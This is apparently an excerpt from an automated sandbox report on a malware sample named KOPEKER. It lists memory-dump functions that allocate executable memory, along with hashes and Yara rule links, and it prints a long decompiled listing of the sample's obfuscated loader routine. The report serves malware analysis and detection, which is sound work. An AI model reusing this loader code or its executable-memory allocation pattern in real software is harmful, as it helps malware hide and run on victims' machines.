          Function 00409FB6, Relevance: 2.1, APIs: 1, Instructions: 835memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: cdfb6b898d4d9616101503a3f86e64ab8cca97e455e5cd99f838c21593286452
          • Instruction ID: 3a65ce1780872a204f4627bb8081d6e5f9e03d049ebd0e222f85ee6a7ea49785
          • Opcode Fuzzy Hash: cdfb6b898d4d9616101503a3f86e64ab8cca97e455e5cd99f838c21593286452
          • Instruction Fuzzy Hash: AB22DD41A2A70688FFB32060C5D072D6980DF16385F718F3BDC61F59E2A71F86CA2687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409E98, Relevance: 2.1, APIs: 1, Instructions: 831memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 88c775f0940b7ffdd1519aac8282d89a83a719681f97c4b76d40fcc81e8dd9c4
          • Instruction ID: 6e847d931952a6e08f35d4d6336674397aa3e82927434d9abc6fae3a7e5e8c62
          • Opcode Fuzzy Hash: 88c775f0940b7ffdd1519aac8282d89a83a719681f97c4b76d40fcc81e8dd9c4
          • Instruction Fuzzy Hash: 7B32DD41A2A70689FFB32060C5D076D6980DF16385F718F3BDC61F59E2A71F86CA2687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409F28, Relevance: 2.1, APIs: 1, Instructions: 814memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 4696fee02e6c62ee6f065278f86afc919d13f564aef24fb96329e4ca048aa5ef
          • Instruction ID: ac9918cec08f4d39db5a06ca714e10f9c689912acf001cdb5e62dd152e4e5083
          • Opcode Fuzzy Hash: 4696fee02e6c62ee6f065278f86afc919d13f564aef24fb96329e4ca048aa5ef
          • Instruction Fuzzy Hash: D222CD41A2A70689FFB32060C5D072D6980DF16385F718F3BDD61F59E2A71F86CA2687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A29C, Relevance: 2.0, APIs: 1, Instructions: 757memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: e0ce3618d620e4acb91392a2bc53ddc7caff13180e6383ccd690483c399d8312
          • Instruction ID: a28f1efcf073f7a28f43f30173fbac3a7e058e96183fe18944c2a51a6128e609
          • Opcode Fuzzy Hash: e0ce3618d620e4acb91392a2bc53ddc7caff13180e6383ccd690483c399d8312
          • Instruction Fuzzy Hash: 3612CC85A2A70648FFB22160C5D072D6980DF16385F718F3BDC61F59E2A71F86CE2687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A0E6, Relevance: 2.0, APIs: 1, Instructions: 739memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: bd14c3440fac4595a0a7284eb2470934ef52506da4531f1c494c2c0b02a1e9c7
          • Instruction ID: a58baf95c852c02316cc974c87f576481aea8585c7b256bc9012504b5eb53e25
          • Opcode Fuzzy Hash: bd14c3440fac4595a0a7284eb2470934ef52506da4531f1c494c2c0b02a1e9c7
          • Instruction Fuzzy Hash: 0D22DD85A2A70689FFB32060C5D072D6980DF16385F718F3BDC61F59E2A71F86CA2587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A45A, Relevance: 2.0, APIs: 1, Instructions: 738COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9e6c44e4411dbf8c0d44b76c96dbf881e67621b90bc7e3724d5202f1ae4544f0
          • Instruction ID: 3d3d783de04d9bd84c8762b4cc83add239a96b89d280c620344d085de37c9283
          • Opcode Fuzzy Hash: 9e6c44e4411dbf8c0d44b76c96dbf881e67621b90bc7e3724d5202f1ae4544f0
          • Instruction Fuzzy Hash: 9122234991A70A84EF721060C4C472E6940CF9A345F318F37E861F5ED2B6AF8ADE158B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A09B, Relevance: 2.0, APIs: 1, Instructions: 737memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 7bf6849d2ddb8ab2fcb7285dc042332aeb21a444acf5da52201d2d5e24a87f19
          • Instruction ID: b9810ff6291ed265c7a76fffa19ad7841be9de656f5f1bde107630360577c517
          • Opcode Fuzzy Hash: 7bf6849d2ddb8ab2fcb7285dc042332aeb21a444acf5da52201d2d5e24a87f19
          • Instruction Fuzzy Hash: 1422BD41A2A70649FFB32060C5D072D6980DF16385F718F3BDD61F59E2A71F86CA2587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A3C6, Relevance: 2.0, APIs: 1, Instructions: 725memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a19f08278bfc5ec7bf5f7de82cdb6fa547dedc714e5e240ea4f7de5a2473b46b
          • Instruction ID: f2694dc10188692c7723b34061aedacccff65e9721982211a673bc8efb9b0a45
          • Opcode Fuzzy Hash: a19f08278bfc5ec7bf5f7de82cdb6fa547dedc714e5e240ea4f7de5a2473b46b
          • Instruction Fuzzy Hash: 8502CD81A2A70689FFB22060C5D072D6980DF16385F718F3BD961F59E2A71FC6CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A17E, Relevance: 2.0, APIs: 1, Instructions: 722memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 5306dbac9099d31a500443cdb0a4e90da15711312e322eb511ea3298ab461031
          • Instruction ID: 905c4a5ff58ce8cf966636413460783836c31987d9e85cb62952d3ad7b795cf6
          • Opcode Fuzzy Hash: 5306dbac9099d31a500443cdb0a4e90da15711312e322eb511ea3298ab461031
          • Instruction Fuzzy Hash: E812CD81A2A70689FFB22060C5D072D6980DF16385F718F3BDC61F59E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A749, Relevance: 1.9, APIs: 1, Instructions: 697COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d6095b64d3deb815db09c03a68db08d43af6658146fef9f19c4c2454e9bfec21
          • Instruction ID: 0be68db97572ffe2b8a3ff1a3dfdbd631818ea08528e68caa9798eb8c9f89bcb
          • Opcode Fuzzy Hash: d6095b64d3deb815db09c03a68db08d43af6658146fef9f19c4c2454e9bfec21
          • Instruction Fuzzy Hash: 9E02F24291A70249EFB22164C4D072E6990DF16345F35CF3BC861F65E2E72FC5CA269B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040A4E5, Relevance: 1.9, APIs: 1, Instructions: 649COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7ea36e7bfaa8e6a33854f728b92ee3f5c8978535c83c4687613cc3df5a453c46
          • Instruction ID: 4f7a6360028a4296e027d493effb5d1e2ebfe06e6e77ef50eea966652f32f433
          • Opcode Fuzzy Hash: 7ea36e7bfaa8e6a33854f728b92ee3f5c8978535c83c4687613cc3df5a453c46
          • Instruction Fuzzy Hash: CD02CC81A2A70689FFB32160C5D071D6980DF16385F718F3BD961F58E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004129B4, Relevance: 288.8, APIs: 140, Strings: 24, Instructions: 1783COMMON
          Download Yara Rule
          C-Code - Quality: 62%
          			E004129B4(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				void* _v5;
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				long long* _v28;
				intOrPtr _v40;
				long long _v48;
				intOrPtr _v52;
				long long _v60;
				long long _v68;
				char _v72;
				long long _v76;
				void* _v80;
				void* _v96;
				signed int _v100;
				long long _v108;
				short _v112;
				short _v116;
				char _v132;
				long long _v140;
				signed int _v144;
				short _v148;
				void* _v152;
				long long _v160;
				intOrPtr _v164;
				short _v168;
				short _v172;
				long long _v180;
				long long _v188;
				short _v192;
				long long _v200;
				char _v204;
				intOrPtr _v208;
				long long _v212;
				long long _v220;
				short _v224;
				signed int _v228;
				signed int _v232;
				long long _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				long long _v252;
				intOrPtr _v256;
				long long _v260;
				intOrPtr _v264;
				short _v268;
				short _v272;
				short _v276;
				short _v280;
				short _v284;
				long long _v292;
				intOrPtr _v296;
				long long _v300;
				intOrPtr _v304;
				long long _v308;
				char _v312;
				char _v316;
				char _v320;
				signed int _v324;
				char _v328;
				signed int _v336;
				char _v344;
				signed int _v352;
				char _v360;
				signed int _v368;
				char _v376;
				signed int _v384;
				char _v392;
				signed int _v400;
				char _v408;
				signed int _v416;
				char _v424;
				signed int _v432;
				char _v440;
				signed int _v444;
				signed int _v448;
				char _v456;
				char* _v480;
				intOrPtr _v488;
				intOrPtr _v512;
				intOrPtr _v520;
				short _v556;
				void* _v560;
				signed int _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				long long _v584;
				intOrPtr _v588;
				long long _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int* _v740;
				signed int _v744;
				signed int* _v748;
				signed int _v752;
				signed int _v756;
				signed int* _v760;
				signed int _v764;
				char* _t984;
				signed int _t992;
				signed int _t1003;
				signed int _t1015;
				signed int _t1022;
				signed int _t1027;
				signed int _t1044;
				signed int _t1049;
				signed int _t1068;
				signed int _t1081;
				signed int _t1092;
				signed int _t1095;
				signed int _t1122;
				signed int _t1136;
				signed int _t1156;
				signed int _t1160;
				signed int _t1182;
				signed int _t1189;
				signed int _t1203;
				signed int _t1207;
				signed int _t1213;
				signed int _t1225;
				signed int _t1231;
				signed int _t1248;
				signed int _t1253;
				char* _t1261;
				char* _t1262;
				char* _t1265;
				char* _t1269;
				char* _t1270;
				short _t1279;
				char* _t1286;
				signed int _t1287;
				signed int _t1293;
				signed int _t1295;
				signed int _t1301;
				signed int _t1302;
				signed int _t1306;
				signed int _t1307;
				signed int _t1311;
				signed int _t1329;
				char* _t1333;
				signed int* _t1338;
				char* _t1354;
				signed int* _t1355;
				signed int _t1358;
				signed int _t1365;
				void* _t1367;
				char* _t1370;
				char* _t1374;
				char* _t1376;
				char* _t1378;
				void* _t1436;
				void* _t1439;
				long long* _t1440;
				void* _t1441;
				long long* _t1442;
				intOrPtr* _t1443;
				void* _t1444;
				void* _t1445;
				signed int _t1451;
				long long _t1482;
				long long _t1524;

				_t1367 = __ebx;
				_t1440 = _t1439 - 0x18;
				 *[fs:0x0] = _t1440;
				L004016F0();
				_v28 = _t1440;
				_v24 = 0x4011a8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t1436);
				_v8 = 1;
				_v8 = 2;
				_v368 = 0x80020004;
				_v376 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_t1482 =  *0x401480;
				_v72 = _t1482;
				asm("fld1");
				_v80 = _t1482;
				asm("fld1");
				 *_t1440 = _t1482;
				L00401948();
				_v188 = _t1482;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(3);
				L00401942();
				_t1441 = _t1440 + 0x10;
				_v8 = 3;
				_v384 = 5;
				_v392 = 2;
				_v368 = 0x63;
				_v376 = 2;
				_t31 =  &_v352;
				 *_t31 = _v352 & 0x00000000;
				_v360 = 2;
				_v336 = 0x64;
				_v344 = 2;
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push( &_v408);
				L0040192A();
				_push( &_v408);
				_t984 =  &_v312;
				_push(_t984);
				L00401930();
				_push(_t984);
				L00401936();
				L0040193C();
				asm("fcomp qword [0x401478]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t31 == 0) {
					_t44 =  &_v632;
					 *_t44 = _v632 & 0x00000000;
					__eflags =  *_t44;
				} else {
					_v632 = 1;
				}
				_v596 =  ~_v632;
				_t1370 =  &_v312;
				L00401924();
				_push( &_v408);
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(5);
				L00401942();
				_t1442 = _t1441 + 0x18;
				_t992 = _v596;
				if(_t992 != 0) {
					_v8 = 4;
					_v8 = 5;
					_push(0);
					_push(L"Filmselskabets");
					_push( &_v344);
					L00401918();
					_t992 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v52);
					L0040191E();
					_t1370 =  &_v344;
					L00401912();
				}
				_v8 = 7;
				_push(0x411a30);
				L0040190C();
				if(_t992 != 0x61) {
					_v8 = 8;
					_t1365 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x73);
					asm("fclex");
					_v596 = _t1365;
					_t1451 = _v596;
					if(_t1451 >= 0) {
						_t71 =  &_v636;
						 *_t71 = _v636 & 0x00000000;
						__eflags =  *_t71;
					} else {
						_push(0x254);
						_push(0x4105b8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v636 = _t1365;
					}
				}
				_v8 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v360);
				_push( &_v344);
				asm("fld1");
				_push(_t1370);
				_push(_t1370);
				_v140 = _t1482;
				asm("fld1");
				_push(_t1370);
				_push(_t1370);
				_v148 = _t1482;
				asm("fld1");
				_push(_t1370);
				_push(_t1370);
				 *_t1442 = _t1482;
				L00401900();
				L0040193C();
				asm("fcomp qword [0x401470]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t1451 == 0) {
					_t81 =  &_v640;
					 *_t81 = _v640 & 0x00000000;
					__eflags =  *_t81;
				} else {
					_v640 = 1;
				}
				_v596 =  ~_v640;
				_push( &_v360);
				_push( &_v344);
				_push(2);
				L00401942();
				_t1443 = _t1442 + 0xc;
				if(_v596 != 0) {
					_v8 = 0xb;
					_v8 = 0xc;
					_v448 = _a4;
					_v456 = 9;
					_v480 = L"solicit";
					_v488 = 8;
					_v512 = 0x58e1c9;
					_v520 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"NzXRmXMzPSdU58");
					_push(_v244);
					L004018FA();
					_t1443 = _t1443 + 0x3c;
				}
				_v8 = 0xe;
				_t1003 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1003;
				if(_v596 >= 0) {
					_t111 =  &_v644;
					 *_t111 = _v644 & 0x00000000;
					__eflags =  *_t111;
				} else {
					_push(0x718);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v644 = _t1003;
				}
				_v80 = _v564;
				_v8 = 0xf;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4);
				_v8 = 0x10;
				_v556 = 0x41cc;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, L"samtaleemnetsrhes",  &_v556, 0x75dd00, 0x6d83);
				_v8 = 0x11;
				_v584 =  *0x401468;
				_t1015 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x8904d3f8,  &_v584, 0x6cab, 0x98e72e79,  &_v592);
				_v596 = _t1015;
				if(_v596 >= 0) {
					_t137 =  &_v648;
					 *_t137 = _v648 & 0x00000000;
					__eflags =  *_t137;
				} else {
					_push(0x708);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v648 = _t1015;
				}
				_v76 = _v592;
				_v72 = _v588;
				_v8 = 0x12;
				_v584 =  *0x401460;
				_t1022 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x717675,  &_v584, 0x3f22, 0x98e72e79,  &_v592);
				_v596 = _t1022;
				if(_v596 >= 0) {
					_t155 =  &_v652;
					 *_t155 = _v652 & 0x00000000;
					__eflags =  *_t155;
				} else {
					_push(0x708);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v652 = _t1022;
				}
				_v260 = _v592;
				_v256 = _v588;
				_v8 = 0x13;
				_t1027 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1027;
				if(_v596 >= 0) {
					_t170 =  &_v656;
					 *_t170 = _v656 & 0x00000000;
					__eflags =  *_t170;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v656 = _t1027;
				}
				_v8 = 0x14;
				_v556 = 0x1854;
				_v584 =  *0x401458;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x8904d3f8,  &_v556,  &_v592);
				_v60 = _v592;
				_v8 = 0x15;
				_v556 = 0x5bd9;
				_v584 =  *0x401450;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
				_v276 = _v560;
				_v8 = 0x16;
				_t1044 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1044;
				if(_v596 >= 0) {
					_t204 =  &_v660;
					 *_t204 = _v660 & 0x00000000;
					__eflags =  *_t204;
				} else {
					_push(0x6fc);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v660 = _t1044;
				}
				_v148 = _v556;
				_v8 = 0x17;
				_t1049 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1049;
				if(_v596 >= 0) {
					_t218 =  &_v664;
					 *_t218 = _v664 & 0x00000000;
					__eflags =  *_t218;
				} else {
					_push(0x718);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v664 = _t1049;
				}
				_v228 = _v564;
				_v8 = 0x18;
				L004018F4();
				_v556 = 0x5b73;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
				_v68 = _v584;
				L00401924();
				_v8 = 0x19;
				_v556 = 0x44eb;
				_v584 =  *0x401448;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x98e72e79,  &_v556,  &_v592);
				_v240 = _v592;
				_v8 = 0x1a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v180 = _v584;
				_v8 = 0x1b;
				_t1068 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1068;
				if(_v596 >= 0) {
					_t261 =  &_v668;
					 *_t261 = _v668 & 0x00000000;
					__eflags =  *_t261;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v668 = _t1068;
				}
				_v8 = 0x1c;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x1bd458,  &_v312, 0x5dfa,  &_v584);
				_v108 = _v584;
				_t1374 =  &_v312;
				L00401924();
				_v8 = 0x1d;
				_v564 = 0x98e72e79;
				_v584 =  *0x401440;
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v584, 0x53f0,  &_v564, 0x63dcbf);
				_v8 = 0x1e;
				_t1081 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1081;
				if(_v596 >= 0) {
					_t290 =  &_v672;
					 *_t290 = _v672 & 0x00000000;
					__eflags =  *_t290;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v672 = _t1081;
				}
				_v8 = 0x1f;
				_v556 = 0x66dc;
				_v400 =  *0x401438;
				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v556, _t1374, 0x8904d3f8,  &_v584);
				_v308 = _v584;
				_v304 = _v580;
				_v8 = 0x20;
				_v564 = 0x8904d3f8;
				_v432 =  *0x401430;
				_t1092 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374,  &_v564, 0xf1, 0xcdba990, 0x5b00);
				_v596 = _t1092;
				if(_v596 >= 0) {
					_t314 =  &_v676;
					 *_t314 = _v676 & 0x00000000;
					__eflags =  *_t314;
				} else {
					_push(0x70c);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v676 = _t1092;
				}
				_v8 = 0x21;
				_t1095 =  *((intOrPtr*)( *_a4 + 0x700))(_a4);
				_v596 = _t1095;
				if(_v596 >= 0) {
					_t325 =  &_v680;
					 *_t325 = _v680 & 0x00000000;
					__eflags =  *_t325;
				} else {
					_push(0x700);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v680 = _t1095;
				}
				_v8 = 0x22;
				_v556 = 0x86;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x86,  &_v556, 0x5b0c);
				_v8 = 0x23;
				_v584 =  *0x401428;
				 *_t1443 =  *0x401420;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x462b,  &_v584, _t1374,  &_v556);
				_v272 = _v556;
				_v8 = 0x24;
				_v556 = 0x59;
				_v584 =  *0x401418;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x5b0c,  &_v584,  &_v556,  &_v560);
				_v116 = _v560;
				_v8 = 0x25;
				_v584 =  *0x401410;
				 *_t1443 =  *0x401408;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x69,  &_v584, _t1374,  &_v556);
				_v268 = _v556;
				_v8 = 0x26;
				_v564 = 0x98e72e79;
				 *_t1443 =  *0x401400;
				_t1122 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374,  &_v564, 0x12, 0xb33c5640, 0x5b05);
				_v596 = _t1122;
				if(_v596 >= 0) {
					_t373 =  &_v684;
					 *_t373 = _v684 & 0x00000000;
					__eflags =  *_t373;
				} else {
					_push(0x70c);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v684 = _t1122;
				}
				_v8 = 0x27;
				_v596 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				if(_v596 >= 0) {
					_v688 = _v688 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					if(_t1367 + _t1367 == 0) {
						_push(_v596);
						L00401906();
					}
					asm("jecxz 0x0");
					 *((intOrPtr*)(_t1374 - 0x2ab7b)) =  *((intOrPtr*)(_t1374 - 0x2ab7b)) - 1;
					asm("invalid");
					_pop(es);
				}
				_v8 = 0x28;
				_v556 = 0x1a82;
				_v584 =  *0x4013f8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x596b,  &_v584,  &_v556,  &_v560);
				_v112 = _v560;
				_v8 = 0x29;
				_v564 = 0x2329eb;
				_t399 =  &_v564; // 0x2329eb
